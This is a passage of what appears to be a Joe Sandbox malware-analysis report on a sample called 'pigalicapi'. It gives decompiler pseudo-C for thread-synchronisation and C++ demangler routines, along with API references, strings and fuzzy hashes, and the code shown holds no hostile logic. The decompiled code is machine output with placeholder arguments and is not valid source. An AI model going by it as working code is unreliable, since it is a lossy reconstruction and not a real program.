									 *_t99 = _v36;
									_t72 = WaitForSingleObject(??, ??);
									if(_t72 == 0) {
										L20:
										__eflags = 0;
										return 0;
									} else {
										_t73 = _t72 & 0xffffff00 | _a8 != 0x00000002;
										L9:
										if(_t73 != 0) {
											_t74 = E00412070(_t76, _t78, _t82, _t85, _t87, _t88);
											_t51 = _t76;
											__eflags = _t74;
											if(_t74 == 0) {
												goto L15;
											} else {
												L17:
												return 0x16;
											}
										} else {
											L10:
											_t48 = _t76;
											L11:
											return _t48;
										}
									}
								}
							}
						}
					}
				}
				L59:
			}

APIs

WaitForMultipleObjects.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00411205,FFFFFFFF,?,00413F5C), ref: 004162DE
WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00411205), ref: 0041631F
ResetEvent.KERNEL32 ref: 004163D3

Strings

(, xrefs: 00416530

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: Wait$EventMultipleObjectObjectsResetSingle
String ID: (
API String ID: 256776027-3887548279
Opcode ID: b4733ac531acf217bfbfdf5bd4e52257d9b599610da1baf24221a20e7f36d5fc
Instruction ID: 33d5a718a10795f4640d15a2a31863235bdb1fdf0ba6d8b48b186967bb3fffd1
Opcode Fuzzy Hash: b4733ac531acf217bfbfdf5bd4e52257d9b599610da1baf24221a20e7f36d5fc
Instruction Fuzzy Hash: A9618E71A042089BDF209FA9D5493EEB7A1EB44314F12853BEDA5D7380DB3DC885CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040C8A0 Relevance: 6.3, APIs: 5, Instructions: 99stringCOMMON

Download Yara Rule

APIs

strlen.NTDLL ref: 0040C935
memcpy.NTDLL ref: 0040C950
free.MSVCRT ref: 0040C95A

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: freememcpystrlen
String ID:
API String ID: 2208669145-0
Opcode ID: b95072503d289b122270171115fbda5e346781793e070ee70b941499e8d717ba
Instruction ID: ef56fa0fe3e4a126f61911e2a387ce4b2f316110e497464169164f036395c722
Opcode Fuzzy Hash: b95072503d289b122270171115fbda5e346781793e070ee70b941499e8d717ba
Instruction Fuzzy Hash: F7312DB2208701CBC710AF69D4C072BBBE5EBD5364F140A3EE994A73D0D779D8458B9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040B820 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 246
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040B820(signed char __eax, signed char* __ecx, signed char* __edx) {
				signed char _t104;
				void* _t107;
				void* _t110;
				signed char _t113;
				intOrPtr _t117;
				void* _t120;
				signed char _t121;
				int _t125;
				signed char _t126;
				signed char* _t137;
				char* _t138;
				signed char* _t139;
				char* _t140;
				signed int _t141;
				signed char _t149;
				signed char _t151;
				signed int _t152;
				signed char _t153;
				signed char _t159;
				signed int _t161;
				signed int _t162;
				signed char _t163;
				signed char* _t167;
				signed char* _t168;
				signed char* _t169;
				signed char* _t170;
				intOrPtr* _t172;
				signed char* _t173;
				void* _t174;
				signed char** _t175;

				_t104 = __eax;
				_t137 = __ecx;
				_t175 = _t174 - 0x4c;
				_t175[5] = __edx;
				_t170 = _t175[0x18];
				if(__ecx == 0) {
					L12:
					return _t104;
				} else {
					_t169 = __eax;
					_t104 =  *(__eax + 0x118);
					if(_t104 == 0) {
						do {
							if(_t137[8] != 0) {
								L11:
								_t137 =  *_t137;
								if(_t137 != 0) {
									goto L3;
								} else {
									goto L12;
								}
							} else {
								_t143 = _t137[4];
								_t104 =  *(_t137[4]);
								if(_t170 != 0 || _t104 - 0x1c > 4) {
									_t137[8] = 1;
									_t167 = _t169[0x110];
									_t169[0x110] = _t137[0xc];
									if(_t104 == 0x29) {
										 *_t175 =  *_t137;
										_t107 = E0040BE20(_t169, _t143 + 8, _t175[5]);
										_t169[0x110] = _t167;
										return _t107;
									} else {
										if(_t104 == 0x2a) {
											 *_t175 =  *_t137;
											_t110 = E0040BBA0(_t169, _t143 + 4, _t175[5]);
											_t169[0x110] = _t167;
											return _t110;
										} else {
											if(_t104 == 2) {
												_t169[0x114] = 0;
												E0040B090(_t169,  *((intOrPtr*)(_t143 + 4)), _t175[5]);
												_t113 = _t169[0x100];
												if((_t175[5] & 0x00000004) != 0) {
													if(_t113 == 0xff) {
														_t169[0xff] = 0;
														_t175[1] = 0xff;
														 *_t175 = _t169;
														_t175[2] = _t169[0x10c];
														_t169[0x108]();
														_t159 = 1;
														_t113 = 0;
														_t169[0x120] = _t169[0x120] + 1;
													} else {
														_t159 = _t113 + 1;
													}
													_t169[0x100] = _t159;
													_t169[_t113] = 0x2e;
													_t169[0x104] = 0x2e;
												} else {
													_t173 = 0x41fa44;
													_t175[6] = _t137;
													while(1) {
														_t141 =  *_t173 & 0x000000ff;
														if(_t113 != 0xff) {
															_t153 = _t113 + 1;
														} else {
															_t169[0xff] = 0;
															_t175[1] = 0xff;
															 *_t175 = _t169;
															_t175[2] = _t169[0x10c];
															_t169[0x108]();
															_t153 = 1;
															_t113 = 0;
															_t169[0x120] = _t169[0x120] + 1;
														}
														_t173 =  &(_t173[1]);
														_t169[0x100] = _t153;
														_t169[_t113] = _t141;
														_t169[0x104] = _t141;
														if(_t173 == 0x41fa46) {
															break;
														}
														_t113 = _t153;
													}
													_t137 = _t175[6];
												}
												_t172 =  *((intOrPtr*)(_t137[4] + 8));
												_t117 =  *_t172;
												if(_t117 == 0x45) {
													_t121 = _t169[0x100];
													_t138 = "{default arg#";
													while(1) {
														_t161 =  *_t138 & 0x000000ff;
														if(_t121 != 0xff) {
															_t149 = _t121 + 1;
														} else {
															_t169[0xff] = 0;
															_t175[6] = _t161;
															_t175[1] = 0xff;
															_t175[2] = _t169[0x10c];
															 *_t175 = _t169;
															_t169[0x108]();
															_t149 = 1;
															_t121 = 0;
															_t169[0x120] = _t169[0x120] + 1;
															_t161 = _t175[6];
														}
														_t138 =  &(_t138[1]);
														_t169[0x100] = _t149;
														_t169[_t121] = _t161;
														_t169[0x104] = _t161;
														if(_t138 == 0x41fa54) {
															break;
														}
														_t121 = _t149;
													}
													_t139 =  &(_t175[9]);
													_t175[1] = "%ld";
													 *_t175 = _t139;
													_t175[2] =  *((intOrPtr*)(_t172 + 8)) + 1;
													sprintf(??, ??);
													 *_t175 = _t139;
													_t125 = strlen(??);
													if(_t125 == 0) {
														_t126 = _t169[0x100];
													} else {
														_t163 = _t169[0x100];
														_t175[6] = _t167;
														_t168 =  &(_t139[_t125]);
														while(1) {
															_t152 =  *_t139 & 0x000000ff;
															if(_t163 != 0xff) {
																_t126 = _t163 + 1;
															} else {
																_t169[0xff] = 0;
																_t175[7] = _t152;
																_t175[1] = 0xff;
																_t175[2] = _t169[0x10c];
																 *_t175 = _t169;
																_t169[0x108]();
																_t126 = 1;
																_t163 = 0;
																_t169[0x120] = _t169[0x120] + 1;
																_t152 = _t175[7];
															}
															_t139 =  &(_t139[1]);
															_t169[0x100] = _t126;
															_t169[_t163] = _t152;
															_t169[0x104] = _t152;
															if(_t139 == _t168) {
																break;
															}
															_t163 = _t126;
														}
														_t167 = _t175[6];
													}
													_t140 = "}::";
													while(1) {
														_t162 =  *_t140 & 0x000000ff;
														if(_t126 != 0xff) {
															_t151 = _t126 + 1;
														} else {
															_t169[0xff] = 0;
															_t175[6] = _t162;
															_t175[1] = 0xff;
															_t175[2] = _t169[0x10c];
															 *_t175 = _t169;
															_t169[0x108]();
															_t151 = 1;
															_t126 = 0;
															_t169[0x120] = _t169[0x120] + 1;
															_t162 = _t175[6];
														}
														_t140 =  &(_t140[1]);
														_t169[0x100] = _t151;
														_t169[_t126] = _t162;
														_t169[0x104] = _t162;
														if(_t140 == 0x41fa5c) {
															L28:
															_t172 =  *((intOrPtr*)(_t172 + 4));
															_t117 =  *_t172;
															goto L29;
														} else {
															_t126 = _t151;
															continue;
														}
														L30:
														_t120 = E0040B090(_t169, _t172, _t175[5]);
														_t169[0x110] = _t167;
														return _t120;
														goto L53;
													}
												}
												L29:
												if(_t117 - 0x1c <= 4) {
													goto L28;
												}
												goto L30;
											} else {
												_t104 = E0040B0B0(_t169, _t143, _t175[5]);
												_t169[0x110] = _t167;
												goto L11;
											}
										}
									}
								} else {
									goto L11;
								}
							}
							goto L53;
							L3:
							_t104 = _t169[0x118];
						} while (_t104 == 0);
					} else {
					}
					goto L12;
				}
				L53:
			}

Strings

}::, xrefs: 0040BB26
{default arg#, xrefs: 0040BA12

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID:
String ID: {default arg#$}::
API String ID: 0-3706473490
Opcode ID: f6a5695efae2835f33b0a44589fd0ae4fef321bba4350e7326e33b460c672c70
Instruction ID: f4f608b1dceb6418645120ccea16dd4763757164fdb04872707e84549da8f2de
Opcode Fuzzy Hash: f6a5695efae2835f33b0a44589fd0ae4fef321bba4350e7326e33b460c672c70
Instruction Fuzzy Hash: 28A15370608741CBC725DF28C0847ABBBE1EF94304F14883EE5DA9B341D779A885DB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00412EC0 Relevance: 6.2, APIs: 4, Instructions: 166
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 20%

			E00412EC0(signed int __ecx, void* __edx, void* __edi, char* _a4, signed int _a8) {
				void* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char* _v24;
				char* _v28;
				char _v32;
				intOrPtr _v52;
				char* _v56;
				void* __ebx;
				void* __esi;
				void* __ebp;
				char* _t46;
				void* _t48;
				char* _t49;
				void* _t51;
				char* _t52;
				int _t53;
				signed int _t54;
				intOrPtr _t55;
				char* _t56;
				char* _t61;
				char* _t71;
				long _t77;
				char* _t78;
				char* _t81;
				void* _t84;
				void* _t86;
				void* _t88;
				char* _t89;
				char** _t92;
				char** _t93;

				_t88 = __edi;
				_t86 = __edx;
				_t85 = __ecx;
				_t46 =  *0x422414; // 0xa52558
				_v28 = 0;
				_t89 = _a4;
				_v24 = 0;
				_v20 = 0xfeedbab1;
				_v16 = 1;
				if(_t46 == 0) {
					_v52 = 0x40ef40;
					_v56 = 4;
					 *_t92 = "mtx_pthr_locked_shmem";
					_t46 = E00414330(__eflags);
					 *0x422414 = _t46;
				}
				 *_t92 = _t46;
				E00413FD0();
				 *_t92 = _t89;
				_t48 = E004107C0(_t86);
				_t84 = _t48;
				if(_t48 == 0) {
					L4:
					_t49 =  *0x422414; // 0xa52558
					if(_t49 == 0) {
						_v52 = 0x40ef40;
						_v56 = 4;
						 *_t92 = "mtx_pthr_locked_shmem";
						_t49 = E00414330(__eflags);
						 *0x422414 = _t49;
					}
					 *_t92 = _t49;
					E00413A00(_t85);
					_t51 = 3;
					goto L6;
				} else {
					_t52 =  *(_t48 + 0x14);
					if(_t52 == 0) {
						goto L4;
					} else {
						_v56 =  &_v32;
						 *_t92 = _t52;
						_t53 = GetHandleInformation(??, ??);
						_t92 = _t92 - 8;
						if(_t53 != 0) {
							__eflags =  *(_t84 + 0x24) & 0x00000004;
							if(( *(_t84 + 0x24) & 0x00000004) == 0) {
								_t54 = E004102F0(_t84, _t85,  &_v32, _t88, _t89);
								__eflags = _t54;
								if(_t54 == 0) {
									_t55 = 0;
								} else {
									_t55 =  *((intOrPtr*)(_t54 + 0xbc));
								}
								__eflags = _t89 - _t55;
								if(_t89 == _t55) {
									_t56 =  *0x422414; // 0xa52558
									__eflags = _t56;
									if(__eflags == 0) {
										_v52 = 0x40ef40;
										_v56 = 4;
										 *_t92 = "mtx_pthr_locked_shmem";
										_t56 = E00414330(__eflags);
										 *0x422414 = _t56;
									}
									 *_t92 = _t56;
									E00413A00(_t85);
									_t51 = 0x24;
								} else {
									__eflags =  *(_t84 + 0x70);
									if( *(_t84 + 0x70) != 0) {
										L22:
										 *_t92 =  *(_t84 + 0x14);
										CloseHandle(??);
										_t61 =  *(_t84 + 0x18);
										_t93 = _t92 - 4;
										__eflags = _t61;
										if(_t61 != 0) {
											 *_t93 = _t61;
											CloseHandle(??);
											_t93 = _t93 - 4;
										}
										 *(_t84 + 0x18) = 0;
										__eflags = _a8;
										if(_a8 != 0) {
											_t85 = _a8;
											 *_a8 =  *((intOrPtr*)(_t84 + 4));
										}
										_t30 = _t84 + 0x1c; // 0x1c
										 *_t93 = _t30;
										E004140E0();
										 *(_t84 + 0x34) = _v28;
										__eflags =  *(_t84 + 0xb8);
										 *(_t84 + 0x38) = _v24;
										 *((intOrPtr*)(_t84 + 0x3c)) = _v20;
										 *((intOrPtr*)(_t84 + 0x40)) = _v16;
										if( *(_t84 + 0xb8) == 0) {
											E0040FD20(_t84);
										}
										_t71 =  *0x422414; // 0xa52558
										__eflags = _t71;
										if(__eflags == 0) {
											_v52 = 0x40ef40;
											_v56 = 4;
											 *_t93 = "mtx_pthr_locked_shmem";
											_t71 = E00414330(__eflags);
											 *0x422414 = _t71;
										}
										 *_t93 = _t71;
										E00413A00(_t85);
										E00412210();
										_t51 = 0;
									} else {
										_v56 = 0;
										 *_t92 =  *(_t84 + 0x14);
										_t77 = WaitForSingleObject(??, ??);
										_t92 = _t92 - 8;
										__eflags = _t77;
										if(_t77 == 0) {
											goto L22;
										} else {
											_t78 =  *0x422414; // 0xa52558
											__eflags = _t78;
											if(__eflags == 0) {
												_v52 = 0x40ef40;
												_v56 = 4;
												 *_t92 = "mtx_pthr_locked_shmem";
												_t78 = E00414330(__eflags);
												 *0x422414 = _t78;
											}
											 *_t92 = _t78;
											E00413A00(_t85);
											E00412210();
											_t51 = 0x10;
										}
									}
								}
								L6:
								return _t51;
							} else {
								_t81 =  *0x422414; // 0xa52558
								__eflags = _t81;
								if(__eflags == 0) {
									_v52 = 0x40ef40;
									_v56 = 4;
									 *_t92 = "mtx_pthr_locked_shmem";
									_t81 = E00414330(__eflags);
									 *0x422414 = _t81;
								}
								 *_t92 = _t81;
								E00413A00(_t85);
								return 0x16;
							}
						} else {
							goto L4;
						}
					}
				}
			}

APIs

GetHandleInformation.KERNEL32 ref: 00412F1B
WaitForSingleObject.KERNEL32 ref: 00412FF0

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: HandleInformationObjectSingleWait
String ID:
API String ID: 77340887-0
Opcode ID: d317a26b3cd460a8ecd9a6efaadd092c3b0c37b6c9f4cd4961985edcf548a9ad
Instruction ID: 5295104ccd4e77eb4c30db888a1abb3289d5021b4c5d851bebd00781382d59b2
Opcode Fuzzy Hash: d317a26b3cd460a8ecd9a6efaadd092c3b0c37b6c9f4cd4961985edcf548a9ad
Instruction Fuzzy Hash: 4F618EB06043059FDB10EF65D68439ABFF4AF04344F40882EE884DB345D7B8D982CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 004083F4 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E004083F4(signed int* __ebx, void* __ecx, void* __ebp, char* _a4, signed int _a8, signed int _a12, signed int _a16, char _a48) {
				signed int _t87;
				signed int _t90;
				signed int* _t93;
				unsigned int _t97;
				void* _t99;
				signed int _t100;
				signed int _t103;
				signed int* _t108;
				signed int _t112;
				signed int _t113;
				signed int _t118;
				signed int _t120;
				signed int _t122;
				signed int _t123;
				signed int* _t124;
				void* _t126;
				signed int _t127;
				signed int _t130;
				intOrPtr* _t132;
				char* _t134;
				char* _t136;
				signed char* _t138;
				void* _t141;
				signed int** _t142;

				_t108 = __ebx;
				_t130 = _a12;
				E0040B090(__ebx,  *((intOrPtr*)(__ecx + 4)), _t130);
				_t87 = __ebx[0x40];
				if((_t130 & 0x00000004) != 0) {
					if(_t87 == 0xff) {
						__ebx[0x3f] = 0;
						_a4 = 0xff;
						 *_t142 = __ebx;
						_a8 = __ebx[0x43];
						__ebx[0x42]();
						_t122 = 1;
						_t87 = 0;
						__ebx[0x48] = __ebx[0x48] + 1;
					} else {
						_t122 = _t87 + 1;
					}
					_t108[0x40] = _t122;
					 *((char*)(_t108 + _t87)) = 0x2e;
					_t108[0x41] = 0x2e;
					goto L11;
				} else {
					__esi = 0x41fa44;
					while(1) {
						__edx =  *__esi & 0x000000ff;
						if(__eax != 0xff) {
							__ecx = __eax + 1;
						} else {
							__eax =  *(__ebx + 0x10c);
							_a16 = __edx;
							 *((char*)(__ebx + 0xff)) = 0;
							_a4 = 0xff;
							_a8 =  *(__ebx + 0x10c);
							 *__esp = __ebx;
							__eax =  *((intOrPtr*)(__ebx + 0x108))();
							__ecx = 1;
							__eax = 0;
							 *((intOrPtr*)(__ebx + 0x120)) =  *((intOrPtr*)(__ebx + 0x120)) + 1;
							__edx = _a16;
						}
						__esi =  &(__esi[1]);
						 *(__ebx + 0x100) = __ecx;
						 *((char*)(__ebx + __eax)) = __dl;
						 *((char*)(__ebx + 0x104)) = __dl;
						if(__esi == 0x41fa46) {
							break;
						}
						__eax = __ecx;
					}
					L11:
					_t132 = _a8;
					if( *_t132 == 0x45) {
						_t90 = _t108[0x40];
						_t134 = "{default arg#";
						while(1) {
							_t123 =  *_t134 & 0x000000ff;
							if(_t90 != 0xff) {
								_t112 = _t90 + 1;
							} else {
								_a16 = _t123;
								_t108[0x3f] = 0;
								_a4 = 0xff;
								_a8 = _t108[0x43];
								 *_t142 = _t108;
								_t108[0x42]();
								_t112 = 1;
								_t90 = 0;
								_t108[0x48] = _t108[0x48] + 1;
								_t123 = _a16;
							}
							_t134 =  &(_t134[1]);
							_t108[0x40] = _t112;
							 *(_t108 + _t90) = _t123;
							_t108[0x41] = _t123;
							if(_t134 == 0x41fa54) {
								break;
							}
							_t90 = _t112;
						}
						_a4 = "%ld";
						_a8 =  *((intOrPtr*)(_t132 + 8)) + 1;
						_t93 =  &_a48;
						 *_t142 = _t93;
						_a16 = _t93;
						sprintf(??, ??);
						_t124 = _t93;
						do {
							_t113 =  *_t124;
							_t124 =  &(_t124[1]);
							_t97 = _t113 - 0x01010101 &  !_t113 & 0x80808080;
						} while (_t97 == 0);
						_t98 =  ==  ? _t97 >> 0x10 : _t97;
						_t125 =  ==  ?  &(_t124[0]) : _t124;
						_t99 = ( ==  ? _t97 >> 0x10 : _t97) + ( ==  ? _t97 >> 0x10 : _t97);
						asm("sbb edx, 0x3");
						_t126 = ( ==  ?  &(_t124[0]) : _t124) - _a16;
						if(_t126 == 0) {
							_t127 = _t108[0x40];
							L29:
							_t136 = "}::";
							while(1) {
								_t100 =  *_t136 & 0x000000ff;
								if(_t127 != 0xff) {
									_t118 = _t127 + 1;
								} else {
									_a16 = _t100;
									_t108[0x3f] = 0;
									_a4 = 0xff;
									_a8 = _t108[0x43];
									 *_t142 = _t108;
									_t108[0x42]();
									_t118 = 1;
									_t127 = 0;
									_t108[0x48] = _t108[0x48] + 1;
									_t100 = _a16;
								}
								_t136 =  &(_t136[1]);
								_t108[0x40] = _t118;
								 *(_t108 + _t127) = _t100;
								_t108[0x41] = _t100;
								if(_t136 == 0x41fa5c) {
									_t132 =  *((intOrPtr*)(_t132 + 4));
									goto L12;
								}
								_t127 = _t118;
							}
						}
						_t138 = _a16;
						_t103 = _t108[0x40];
						_t141 = _t126 + _t138;
						while(1) {
							_t120 =  *_t138 & 0x000000ff;
							if(_t103 != 0xff) {
								_t127 = _t103 + 1;
							} else {
								_a16 = _t120;
								_t108[0x3f] = 0;
								_a4 = 0xff;
								_a8 = _t108[0x43];
								 *_t142 = _t108;
								_t108[0x42]();
								_t127 = 1;
								_t103 = 0;
								_t108[0x48] = _t108[0x48] + 1;
								_t120 = _a16;
							}
							_t138 =  &(_t138[1]);
							_t108[0x40] = _t127;
							 *(_t108 + _t103) = _t120;
							_t108[0x41] = _t120;
							if(_t138 == _t141) {
								goto L29;
							}
							_t103 = _t127;
						}
					}
					L12:
					_t87 = E0040B090(_t108, _t132, _a12);
					return _t87;
				}
			}

Strings

., xrefs: 004095B6
}::, xrefs: 0040A425
{default arg#, xrefs: 0040A2ED

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID:
String ID: .${default arg#$}::
API String ID: 0-723286900
Opcode ID: 807978e2fe12c8e62650436d5fac89316e3c74444dbfa66250aab1241fff8e95
Instruction ID: 111b32b15ac1d8639141e8955343ba3e421cf829549de16c4b54ac847c584bdd
Opcode Fuzzy Hash: 807978e2fe12c8e62650436d5fac89316e3c74444dbfa66250aab1241fff8e95
Instruction Fuzzy Hash: B4714E70508382CBC715CF18C0847A5BBE1AF95304F1889BEECC99F386D7B99889DB56

Uniqueness

Uniqueness Score: -1.00%

Function 004088F8 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

APIs

sprintf.MSVCRT ref: 00409E3C

Strings

this, xrefs: 00408909
}, xrefs: 00409F02
{parm#, xrefs: 00409DB7

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: sprintf
String ID: this${parm#$}
API String ID: 590974362-3278767634
Opcode ID: 30e33bfbb701848d574accebed10949c52124b3b754f770995b392d252369856
Instruction ID: 6ca329e72789fd266b2bb598c5e7687cf637df336f52b9e7cc6e2d8447b8da5e
Opcode Fuzzy Hash: 30e33bfbb701848d574accebed10949c52124b3b754f770995b392d252369856
Instruction Fuzzy Hash: FC514A7050C2418BCB15CF28C0847A67BE1AF94310F0889BEECCD9F387D7B998859B96

Uniqueness

Uniqueness Score: -1.00%

Function 00412D80 Relevance: 6.1, APIs: 4, Instructions: 93
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 33%

			E00412D80(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				void* _v16;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				char* _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t33;
				intOrPtr _t35;
				int _t36;
				void* _t37;
				intOrPtr _t38;
				intOrPtr _t44;
				void* _t56;
				void* _t57;
				intOrPtr _t63;
				intOrPtr* _t66;
				intOrPtr* _t67;
				intOrPtr* _t68;

				_t57 = __ecx;
				_t63 = _a4;
				 *_t66 = _t63;
				_t33 = E004107C0(__edx);
				_v44 = 0;
				_v36 = 0xfeedbab1;
				_v40 = 0;
				_v32 = 1;
				_t56 = _t33;
				if(_t33 == 0) {
					L3:
					_t64 = 3;
					L4:
					return _t64;
				}
				_t35 =  *((intOrPtr*)(_t33 + 0x14));
				if(_t35 == 0) {
					goto L3;
				}
				_v72 =  &_v48;
				 *_t66 = _t35;
				_t36 = GetHandleInformation(??, ??);
				_t67 = _t66 - 8;
				if(_t36 != 0) {
					_t64 = 0x16;
					if(( *(_t56 + 0x24) & 0x00000004) == 0) {
						_t37 = E004102F0(_t56, _t57,  &_v48, _t63, 0x16);
						if(_t37 == 0) {
							_t38 = 0;
						} else {
							_t38 =  *((intOrPtr*)(_t37 + 0xbc));
						}
						_t64 = 0x24;
						if(_t63 != _t38) {
							E00412210();
							if( *((intOrPtr*)(_t56 + 0x70)) == 0) {
								_v72 = 0xffffffff;
								 *_t67 =  *((intOrPtr*)(_t56 + 0x14));
								WaitForSingleObject(??, ??);
								_t67 = _t67 - 8;
							}
							 *_t67 =  *((intOrPtr*)(_t56 + 0x14));
							CloseHandle(??);
							_t44 =  *((intOrPtr*)(_t56 + 0x18));
							_t68 = _t67 - 4;
							if(_t44 != 0) {
								 *_t68 = _t44;
								CloseHandle(??);
								_t68 = _t68 - 4;
							}
							 *((intOrPtr*)(_t56 + 0x18)) = 0;
							if(_a8 != 0) {
								 *_a8 =  *((intOrPtr*)(_t56 + 4));
							}
							_t64 = 0;
							 *_t68 = _t56 + 0x1c;
							E004140E0();
							 *((intOrPtr*)(_t56 + 0x34)) = _v44;
							 *((intOrPtr*)(_t56 + 0x38)) = _v40;
							 *((intOrPtr*)(_t56 + 0x3c)) = _v36;
							 *((intOrPtr*)(_t56 + 0x40)) = _v32;
							if( *((intOrPtr*)(_t56 + 0xb8)) == 0) {
								E0040FD20(_t56);
							}
						}
					}
					goto L4;
				}
				goto L3;
			}

APIs

